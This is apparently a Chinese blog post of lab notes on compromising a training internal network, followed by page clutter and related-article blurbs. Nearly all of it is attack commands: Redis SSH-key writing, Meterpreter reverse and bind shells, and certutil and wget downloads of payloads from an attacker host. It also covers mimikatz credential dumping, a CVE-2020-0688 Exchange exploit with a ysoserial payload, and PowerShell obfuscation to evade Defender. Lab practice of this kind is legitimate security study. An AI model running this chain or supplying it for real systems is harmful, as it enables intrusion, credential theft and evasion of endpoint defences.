内网攻防-小迪安全vpc3

最新推荐文章于 2025-06-09 23:36:15 发布
最新推荐文章于 2025-06-09 23:36:15 发布
阅读量1.1k 收藏 14
点赞数 13
分类专栏: #014内网攻防 小迪笔记 文章标签: 安全 内网攻防 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_74402888/article/details/145089759
版权

环境搭建

Ubuntu-web1

web

web2021

Ubuntu-web2

Windows 2012

登录到域中 :

rootkit\sqladmin

Admin12345

本地管理登陆 :

.\administrator

admin!@#45

Windows2012-DC

内建域管账号密码:

rootkit\administrator

admin!@#45

Win10-defender

xiaodi

xiaodi

关闭防火墙

iptables -F

启动redis

redis-server /etc/redis.conf

Web2

关闭防火墙

sudo -i

iptables -F

二、redis入口点,拿下web1

一、在攻击机(redis客户端)中生成ssh公钥和私钥,密码设置为空

sudo ssh-keygen

二、进入/root/.ssh目录: cd /root/.ssh , 讲生成的公钥保存到1.txt(名字随意)

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

三、链接目标服务器上的Redis服务,将保存的公钥1.txt写入Redis(使用redis-cli -h ip命令连接靶机,将文件写入)

$ cat foo.txt | redis-cli -h 192.168.16.193 -x set crack

四、通过客户端远程登陆目标靶机的Redis服务

使用 CONFIG GET dir 命令得到Redis备份的路径

redis-cli -h 192.168.16.193

CONFIG GET dir

更改Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh)

config set dir /root/.ssh

设置上传公钥的备份文件名字为authorized_keys

CONFIG SET dbfilename authorized_keys

检查是否更改成功(查看有没有authorized_keys文件),没有问题就保存然后退出

CONFIG GET dbfilename

save

exit

ssh连接

ssh 192.168.16.193

上线msf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.16.135 LPORT=1111 -f elf > 1111.elf

msfconsole

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 192.168.16.135

set lport 1111

run

启动python创建服务

python3 -m http.server 8080

wget http://192.168.16.135:8080/1111.elf

三、ssh协议的横向移动

cat ~/.bash_history

ssh 192.168.52.20

上线msf

Kali->ubuntu-web1-ubuntu-web2

wget http://192.168.16.135:8080/1112.elf

python3 -m http.server 8080

wget http://192.168.52.10:8080/1112.elf

添加路由

run autoroute -p

run post/multi/manage/autoroute

正向上线

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=2020 -f elf > 2020.elf

use exploit/multi/handler

set payload linux/x64/meterpreter/bind_tcp

set rhost 192.168.52.20

set lport 1112

run

四、win2012-web信息泄露

添加路由

run autoroute -p

run post/multi/manage/autoroute

Socks5代理添加

use auxiliary/server/socks_proxy

set SRVHOST 127.0.0.1  #或者默认0.0.0.0

run

源码信息泄露

LazyOA,sa,admin

myssql数据库信息泄露

Payload (因为是靶机测试,可以在Kali开启apache2服务或者使用WinSCP将木马传入目标靶机,方便后面监听)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.93.10 LPORT=1115 -f exe > 1115.exe

开启监听

use exploit/multi/handler

设置payload

set payload windows/x64/meterpreter/reverse_tcp

设置lhost

set lhost 192.168.93.10

设置lport

set lport 1115

权限提升

getsystem

run post/multi/manage/autoroute

五、exchange漏洞利用

信息收集

setspn -T rootkit.org -q */*

上传minikatz.exe

mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”

暴力破解拿到密码Admin12345

添加代理

Cve-2020-0688

C:\python38\python.exe cve-2020-0688.py -s https://192.168.3.144 -u micle@rootkit.org -p Admin12345 -c “cmd /c certutil.exe -urlcache -split -f http://192.168.3.73/4.exe c:\\4.exe”

上传木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1116 -f exe  -o 1116.exe

upload /home/kali/Desktop/1116.exe c:\\inetpub\\wwwroot\\1116.exe

修改host文件

重新建立代理

use auxiliary/server/socks_proxy

C:\python38\python.exe cve-2020-0688.py -s https://192.168.3.144/owa -u micle@rootkit.org -p Admin12345 -c “certutil.exe -urlcache -split -f http://192.168.3.73/1116.exe c:\\1116.exe”

C:\python38\python.exe cve-2020-0688.py -s https://192.168.3.144/owa -u micle@rootkit.org -p Admin12345 -c “cmd /c c:\\1116.exe”

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "mstsc" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="4e7c270d-4668-4d55-a504-f74129bfa7b8" --isdebug –islegacy

/wEygQYAAQAAAP8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACjBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI+DQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA+DQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc+bXN0c2M8L1N5c3RlbTpTdHJpbmc+DQogICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI+DQo8L1Jlc291cmNlRGljdGlvbmFyeT4L8qrYGlJucNoxElGEQKmOFkiny/s=

use exploit/multi/handler

set payload  windows/x64/meterpreter/bind_tcp

set rhost 192.168.3144

set lport 1116

六、免杀绕过defender

mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords”

利用套件wmi

python wmiexec.py rootkit.org/administrator:admin!@#45@192.168.3.74

certutil.exe -urlcache -split -f http://192.168.3.73/1116.exe c:\\1116.exe

混淆加密

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=1999 -f psh-reflection > 19991.ps1

powershell

Import-Module ./AES-Encoder.ps1

Invoke-AES-Encoder -InFile .\1999.ps1 -OutFile 1999s.ps1 -Iterations 3

powershell无法安装模块的解决方法_install-module : 在模块“powershellget”中找到“install-mod-优快云博客

Sessions 3

upload /home/kali/Desktop/1999s.ps1 c:\\inetpub\\wwwroot\\1999s.exe

certutil.exe -urlcache -split -f http://192.168.3.73/1999s.exe c:\\1999s.ps1

use exploit/multi/handler

set payload  windows/x64/meterpreter/bind_tcp

set rhost 192.168.3.74

set lport 1119

python wmiexec.py rootkit.org/administrator:admin!@#45@192.168.3.74

powershell -ExecutionPolicy bypass -File 5074s.ps1

红队内网攻防渗透:内网渗透之内网对抗:实战项目&VPC1打靶&PHP-RCE&三层代理路由&防火墙上线&密码喷射&域控提权
HACKONE的博客
02-22 443
上面已经抓取到了密码,但是我们通过拓扑分析看,要想上线win10只能通过正向shell,因为win7的防火墙是开的,win10反向主动连接肯定入站规则拦截,而win10自己没有开防火墙,所以win7主动正向连接就可以上线。win7开启了防火墙,入站规则肯定是会拦截我们的请求的,所以我们需要反向上线,让win7主动来连接我们。这里扫描发现是存在ms17010漏洞的,但是想上线192.168.2.142的话,我们没有路由是上线不了的,这里有两种办法:一种msf直接生成后门,另一种cs移植后门到msf。
红队内网攻防渗透:内网渗透之内网对抗:实战项目&VPC2打靶&父子域三层路由&某绒免杀&下载突破&约束委派&域控提权
HACKONE的博客
02-23 262
但是再上传之前还要考虑shell的正反向问题,有没有防火墙就是关键,我们ping一下2.11,发现ping不通,不用想肯定是开了,那只能反向shell建立连接。将生成的2.jsp文件放进2文件夹,然后右键生成压缩包2.zip,再修改压缩包后缀为war,这样2.war木马包就制作出来了。打开后发现存在SQLserver数据库密码,这样就可以尝试连接2.11的数据库,因为可能密码都是一样的。我们打开目标的火绒发现火绒拦截了我们的shell,因为它开启了防止横向的功能。
21天:信息收集-CDN绕过&Web应用&加速部署&漏洞回链&全网扫描&反向邮件&解析记录
wusaicyq的博客
12-21 1344
通过发送邮件给一个不存在的邮箱地址,因为该用户邮箱不存在,所以发送将失败,并且还会收到一个包含发送该电子邮件给你的服务器的真实IP通知。18. 搜索引擎查询:利用搜索引擎的特定查询语法(如site:和inurl:),结合目标网站的信息,可能找到与网站相关的真实IP地址。子域名,邮件系统,国外访问,证书查询,APP抓包,网络空间,通过漏洞或泄露获取,扫全网,以量打量,第三方接口查询等。:查看网站的favicon.ico文件,通过其唯一的hash值进行识别,有时可以找到与网站相关的真实IP地址。
安全-vpc5-内网攻防
m0_74402888的博客
01-13 630
哥斯拉上不能命令执行则可以在shiro中利用。Getsystem权限提升。heapdump信息泄露。套件尝试绕过横向移动。
内网攻防-安全vpc4
m0_74402888的博客
01-12 887
写ssh密钥到author_keys中。对生成的木马bin文件混淆加密。接着直接使用ssh密钥登录。账号密码均为:kali。
内网渗透day3--(CS&MSF)Socks协议代理进入内网
qq_52227682的博客
11-20 1315
今天学习小内网安全3
DAY196-vpc1-安全
m0_74402888的博客
01-02 1972
相关帐号密码见虚拟机描述:例课程演示:vmware网卡设置:vmware8/NAT 对应192.168.139.0网段vmware2对应192.168.2.0网段vmware3对应192.168.3.0网段vmware10对应192.168.10.0网段记得开启里面的xampp和weblogic服务在做实验那么网络配置如下:配置NAT一块 + vmware2一块Windows 7配置vmware2Windows 10配置vmware2 + vmware3
2024小安全信息收集(完整版)
2401_86628519的博客
01-05 4740
安全信息收集(完整版)
红队攻防渗透技术实战流程:云安全之云服务安全:OSS对象存储
HACKONE的博客
05-16 625
通俗易懂地解释,“云”就像是一个巨大的、虚拟的、可以随时访问的计算机仓库。这个“仓库”里有无数的服务器、存储设备和其他硬件资源,它们通过网络连接在一起,形成一个庞大的计算网络。这个网络中的资源可以被不同的用户或组织共享,用户只需要通过网络连接,就可以随时随地使用这些资源,而无需自己购买和维护硬件和软件。在线存储:当你把照片或文件上传到像Google Drive、Dropbox或iCloud这样的云服务时,你其实是在使用“云”来存储你的数据。
红队攻防渗透技术实战流程:云安全之云服务安全:ECS和RDS
HACKONE的博客
05-18 362
实例元数据(metadata)包含了弹性计算云服务器实例在阿里云系统中的信息,您可以在运行中的实例内方便地查看实例元数据,并基于实例元数据配置或管理实例。细节方面可通过访问官网找元数据访问触发说明,阿里云例子:https://help.aliyun.com/zh/ecs/user-guide/manage-instance-metadata。腾讯云元数据地址:http://metadata.tencentyun.com/CF 云渗透框架项目:https://wiki.teamssix.com/CF/
系统上公有云安全需要考虑什么?
VinK1的博客
11-30 2236
系统上公有云需要考虑什么问题?
【学习记录】使用 Kali Linux 与 Hashcat 进行 WiFi 安全分析:合法的安全测试指南
行云流水剑的博客
06-09 893
本文介绍了如何使用 Kali Linux 和 Hashcat 对 WiFi 网络进行合法的安全测试。通过监听模式捕获 WPA/WPA2 握手包,并利用工具提取关键信息,将其转换为 Hashcat 支持的格式(模式 22000),最终结合字典或暴力破解方式尝试恢复 WiFi 密码。文章详细讲解了从环境搭建、无线网卡配置、握手包捕获到哈希破解的完整流程,并推荐了常用工具如 airmon-ng、airodump-ng、aireplay-ng 和 hashcat 的使用方法。
加密货币钱包开发指南:多链资产管理与非托管安全范式
Lovely_xwys的博客
06-06 1108
后端:Rust(高性能核心模块) + Go(跨链通信层);前端:React Native(跨平台兼容) + Web3.js(区块链交互);区块链适配:以太坊Solidity、Solana Anchor框架。
第二章 2.3 数据存储安全风险之数据存储风险防范
weixin_43172311的博客
06-04 1184
大家好,今天我想和大家聊聊一个既专业又与我们生活息息相关的话题——数据安全风险防控。无论你是普通用户还是技术从业者,了解这些内容都能帮助你在数字世界中更好地保护自己和他人。
企业私有化部署DeepSeek实战指南:从硬件选型到安全运维——基于国产大模型的安全可控落地实践
MILI_NFT的博客
06-04 1241
随着《生成式AI服务管理暂行办法》实施(2025年4月起),私有化部署将成为企业智能化转型的合规基线,建议优先采用模块化架构为未来升级预留空间。:金融风控(需实时数据处理)、医疗诊断(敏感病历保护)、政务系统(合规性要求)等高隐私需求领域。注:显存容量需≥模型参数×1.5(FP16精度),例如67B模型需≥100GB显存池。模型权重文件(67B约90GB)+ 日志缓存空间(建议预留1TB SSD)启用4-bit量化(降低50%显存):load_in_4bit=True。
打手机检测算法AI智能分析网关V4守护公共/工业/医疗等多场景安全应用
NVR安防视频技术
06-09 467
传统依靠人工巡查的监管方式,存在效率低、覆盖面不足、判断主观性强等问题,难以满足对人员打手机行为精准、实时管控的需求。
【Java后端基础 005】ThreadLocal-线程数据共享和安全
金哥的博客
06-06 862
ThreadLocal常用方法,经典应用场景,以及解析
装载机防撞系统:智能守护,筑牢作业现场人员安全防线
wtsafe的博客
06-06 505
《装载机智能防撞系统重塑工地安全生态》摘要:传统建筑工地中,装载机作业面临视野盲区、复杂地形和粉尘干扰等多重安全隐患。唯创安全推出的智能防撞系统通过AI和UWB技术实现精准防护:AI系统主动探测周边移动目标并动态预警,UWB系统通过测距标签实现三级区域精确防护(精度达10厘米),结合自动限速和停车功能,从根本上杜绝碰撞事故。这种从被动防护到智能预警的转变,显著提升了工地安全水平,推动传统工地向"智慧安全工地"转型。(149字)
云原生安全实战:API网关Envoy的鉴权与限流详解
最新发布
like21a的博客
06-09 664
🔥「炎码工坊」技术弹药已装填!点击关注 → 解锁工业级干货【工具实测|项目避坑|源码燃烧指南】
CTFHUB SSRF漏洞
02-25
- **防火墙配置优化**:合理设置云服务商提供的安全组规则以及 VPC 内网 ACL 控制,阻止来自公网对私有子网内资产的未授权访问尝试。 综上所述,为了有效防范 SSRF 类型的安全隐患,开发团队应当综合采取多种防护...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值